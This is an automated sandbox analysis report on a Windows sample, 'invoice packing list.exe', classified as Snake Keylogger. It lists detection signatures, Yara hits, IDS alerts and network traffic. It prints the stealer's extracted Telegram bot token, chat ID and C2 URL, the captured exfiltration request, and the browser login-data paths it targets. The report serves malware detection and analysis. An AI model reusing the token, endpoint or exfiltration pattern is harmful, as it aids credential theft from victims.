Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
invoice packing list.exe

Overview

General Information

Sample name:invoice packing list.exe
Analysis ID:1618382
MD5:20a391888281aae1523bcf182c1cb4e9
SHA1:587eea4c6fc96e91f316c60f31710071764440fa
SHA256:16ac39458488454a5d43d2f0d250fe014bf22ab1542ee6cbd10c6f69ab8d91d8
Tags:exeuser-abuse_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
.NET source code contains potential unpacker
Contains functionality to log keystrokes (.Net Source)
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sample uses string decryption to hide its real strings
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w10x64
  • invoice packing list.exe (PID: 3008 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 6180 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 6396 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
    • invoice packing list.exe (PID: 3716 cmdline: "C:\Users\user\Desktop\invoice packing list.exe" MD5: 20A391888281AAE1523BCF182C1CB4E9)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000005.00000002.4490656225.0000000003199000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x3351f:$a1: get_encryptedPassword
        • 0x33803:$a2: get_encryptedUsername
        • 0x3332b:$a3: get_timePasswordChanged
        • 0x33426:$a4: get_passwordField
        • 0x33535:$a5: set_encryptedPassword
        • 0x34b6d:$a7: get_logins
        • 0x34ad0:$a10: KeyLoggerEventArgs
        • 0x3473b:$a11: KeyLoggerEventArgsEventHandler
        00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x384ea:$x1: $%SMTPDV$
        • 0x36ebc:$x2: $#TheHashHere%&
        • 0x38492:$x3: %FTPDV$
        • 0x36e5c:$x4: $%TelegramDv$
        • 0x3473b:$x5: KeyLoggerEventArgs
        • 0x34ad0:$x5: KeyLoggerEventArgs
        • 0x384b6:$m2: Clipboard Logs ID
        • 0x386f4:$m2: Screenshot Logs ID
        • 0x38804:$m2: keystroke Logs ID
        • 0x38ade:$m3: SnakePW
        • 0x386cc:$m4: \SnakeKeylogger\
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        5.2.invoice packing list.exe.400000.0.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
          5.2.invoice packing list.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
          • 0x14497:$a1: get_encryptedPassword
          • 0x1477b:$a2: get_encryptedUsername
          • 0x142a3:$a3: get_timePasswordChanged
          • 0x1439e:$a4: get_passwordField
          • 0x144ad:$a5: set_encryptedPassword
          • 0x15ae5:$a7: get_logins
          • 0x15a48:$a10: KeyLoggerEventArgs
          • 0x156b3:$a11: KeyLoggerEventArgsEventHandler
          5.2.invoice packing list.exe.400000.0.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
          • 0x1be50:$a2: \Comodo\Dragon\User Data\Default\Login Data
          • 0x1b082:$a3: \Google\Chrome\User Data\Default\Login Data
          • 0x1b4b5:$a4: \Orbitum\User Data\Default\Login Data
          • 0x1c4f4:$a5: \Kometa\User Data\Default\Login Data
          5.2.invoice packing list.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
          • 0x1503a:$s1: UnHook
          • 0x15041:$s2: SetHook
          • 0x15049:$s3: CallNextHook
          • 0x15056:$s4: _hook
          5.2.invoice packing list.exe.400000.0.unpackMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
          • 0x19462:$x1: $%SMTPDV$
          • 0x17e34:$x2: $#TheHashHere%&
          • 0x1940a:$x3: %FTPDV$
          • 0x17dd4:$x4: $%TelegramDv$
          • 0x156b3:$x5: KeyLoggerEventArgs
          • 0x15a48:$x5: KeyLoggerEventArgs
          • 0x1942e:$m2: Clipboard Logs ID
          • 0x1966c:$m2: Screenshot Logs ID
          • 0x1977c:$m2: keystroke Logs ID
          • 0x19a56:$m3: SnakePW
          • 0x19644:$m4: \SnakeKeylogger\
          Click to see the 29 entries

          Sigma Signatures

          No Sigma rule has matched

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:22:49.306309+010028033053Unknown Traffic192.168.2.549709104.21.16.1443TCP
          2025-02-18T20:22:50.565337+010028033053Unknown Traffic192.168.2.549711104.21.16.1443TCP
          2025-02-18T20:22:51.870358+010028033053Unknown Traffic192.168.2.549714104.21.16.1443TCP
          2025-02-18T20:22:53.237725+010028033053Unknown Traffic192.168.2.549717104.21.16.1443TCP
          2025-02-18T20:22:55.789667+010028033053Unknown Traffic192.168.2.549721104.21.16.1443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:22:47.297829+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
          2025-02-18T20:22:48.453996+010028032742Potentially Bad Traffic192.168.2.549706193.122.6.16880TCP
          2025-02-18T20:22:50.001024+010028032742Potentially Bad Traffic192.168.2.549710193.122.6.16880TCP
          2025-02-18T20:22:51.250868+010028032742Potentially Bad Traffic192.168.2.549713193.122.6.16880TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:23:03.218300+010028530061A Network Trojan was detected192.168.2.549725149.154.167.220443TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-02-18T20:23:03.043523+010018100081Potentially Bad Traffic192.168.2.549725149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage?chat_id=7207594974", "Token": "7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s", "Chat_id": "7207594974", "Version": "5.1"}
          Source: invoice packing list.exe.3716.5.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendMessage"}
          Multi AV Scanner detection for submitted file
          Source: invoice packing list.exeReversingLabs: Detection: 59%
          Source: invoice packing list.exeVirustotal: Detection: 60%Perma Link
          Joe Sandbox ML detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Sample uses string decryption to hide its real strings
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpackString decryptor:
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpackString decryptor: 7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s
          Source: 0.2.invoice packing list.exe.3888088.2.raw.unpackString decryptor: 7207594974

          Location Tracking

          barindex
          Tries to detect the country of the analysis system (by using the IP)
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: invoice packing list.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49707 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2
          Source: invoice packing list.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
          Source: Binary string: IhJW.pdb source: invoice packing list.exe
          Source: Binary string: IhJW.pdbSHA256N source: invoice packing list.exe
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then mov eax, dword ptr [ebp-54h]0_2_02703E0C
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 0148F1F6h5_2_0148F007
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 0148FB80h5_2_0148F007
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h5_2_0148E528
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC7C4Dh5_2_06BC7910
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC6A59h5_2_06BC67B0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC4A91h5_2_06BC47E8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC7761h5_2_06BC74B8
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC0741h5_2_06BC0498
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC5799h5_2_06BC54F0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC6EB1h5_2_06BC6C08
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC4EE9h5_2_06BC4C40
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC6049h5_2_06BC5DA0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC0FF1h5_2_06BC0D48
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC64CBh5_2_06BC6220
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC4611h5_2_06BC4368
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC5341h5_2_06BC5098
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC0B99h5_2_06BC08F0
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC7309h5_2_06BC7060
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC02E9h5_2_06BC0040
          Source: C:\Users\user\Desktop\invoice packing list.exeCode function: 4x nop then jmp 06BC5BF1h5_2_06BC5948

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.5:49725 -> 149.154.167.220:443
          Source: Network trafficSuricata IDS: 2853006 - Severity 1 - ETPRO MALWARE Snake Keylogger Telegram Exfil : 192.168.2.5:49725 -> 149.154.167.220:443
          Uses the Telegram API (likely for C&C communication)
          Source: unknownDNS query: name: api.telegram.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c266b4e61cHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
          Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
          Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
          Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknownDNS query: name: checkip.dyndns.org
          Source: unknownDNS query: name: reallyfreegeoip.org
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.6.168:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49717 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49711 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.16.1:443
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49714 -> 104.21.16.1:443
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49707 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
          Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
          Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: unknownHTTP traffic detected: POST /bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207594974&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd50c266b4e61cHost: api.telegram.orgContent-Length: 570Connection: Keep-Alive
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000315D000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
          Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/q
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000002FD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: invoice packing list.exe, 00000005.00000002.4490656225.000000000328E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: invoice packing list.exe, 00000000.00000002.2043114351.0000000003869000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000000.00000002.2043114351.00000000040BE000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003094000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4488887309.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: invoice packing list.exe, 00000005.00000002.4490656225.0000000003134000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000314F000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000318B000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.0000000003127000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.000000000317C000.00000004.00000800.00020000.00000000.sdmp, invoice packing list.exe, 00000005.00000002.4490656225.00000000030D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49725 version: TLS 1.2

          Key, Mouse, Clipboard, Microphone and Screen Capturing
